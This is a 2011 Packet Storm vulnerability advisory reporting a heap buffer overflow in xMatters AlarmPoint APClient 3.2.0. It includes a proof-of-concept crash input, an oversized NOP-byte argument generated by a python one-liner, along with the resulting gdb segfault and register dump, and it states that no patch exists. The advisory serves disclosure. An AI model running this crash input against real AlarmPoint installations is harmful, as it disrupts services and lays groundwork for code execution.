xMatters AlarmPoint APClient 3.2.0 Heap Buffer Overflow

2011-04-29T00:00:00
ID PACKETSTORM:100950
Type packetstorm
Reporter Juan Sacco
Modified 2011-04-29T00:00:00

Description

                                        
                                            ` Information  
--------------------  
Name : Heap Buffer Overflow in xMatters AlarmPoint APClient  
Version: APClient 3.2.0 (native)  
Software : xMatters AlarmPoint  
Vendor Homepage : http://www.xmatters.com  
Vulnerability Type : Heap Buffer Overflow  
Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin  
Severity : High  
Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>  
  
Description  
------------------  
The AlarmPoint Java Server consists of a collection of software  
components and software APIs designed to provide a flexible and  
powerful set of tools for integrating various applications to  
AlarmPoint.  
  
Details  
-------------------  
AlarmPoint APClient is affected by a Heap Overflow vulnerability in   
version APClient 3.2.0 (native)  
  
A heap overflow condition is a buffer overflow, where the buffer that   
can be overwritten is allocated in the heap portion of memory, generally   
meaning that the buffer was allocated using a routine such as the POSIX   
malloc() call.  
https://www.owasp.org/index.php/Heap_overflow  
  
  
Exploit as follow:  
Submit a malicious file cointaining the exploit  
root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$   
./APClient.bin --submit-file maliciousfile.hex  
or  
(gdb) run `python -c 'print "\x90"*16287'`  
Starting program:   
/opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c   
'print "\x90"*16287'`  
  
Program received signal SIGSEGV, Segmentation fault.  
0x0804be8a in free ()  
(gdb) i r  
eax 0xa303924 170932516  
ecx 0xbfb8 49080  
edx 0xa303924 170932516  
ebx 0x8059438 134583352  
esp 0xbfff3620 0xbfff3620  
ebp 0xbfff3638 0xbfff3638  
esi 0x8059440 134583360  
edi 0x80653f0 134632432  
eip 0x804be8a 0x804be8a <free+126>  
eflags 0x210206 [ PF IF RF ID ]  
cs 0x73 115  
ss 0x7b 123  
ds 0x7b 123  
es 0x7b 123  
fs 0x0 0  
gs 0x33 51  
(gdb)  
  
  
Solution  
-------------------  
No patch are available at this time.  
  
Credits  
-------------------  
Manual discovered by Insecurity Research Labs  
Juan Sacco - http://www.insecurityresearch.com  
  
--   
--  
_________________________________________________  
Insecurity Research - Security auditing and testing software  
Web: http://www.insecurityresearch.com  
Insect Pro 2.5 was released stay tunned  
  
`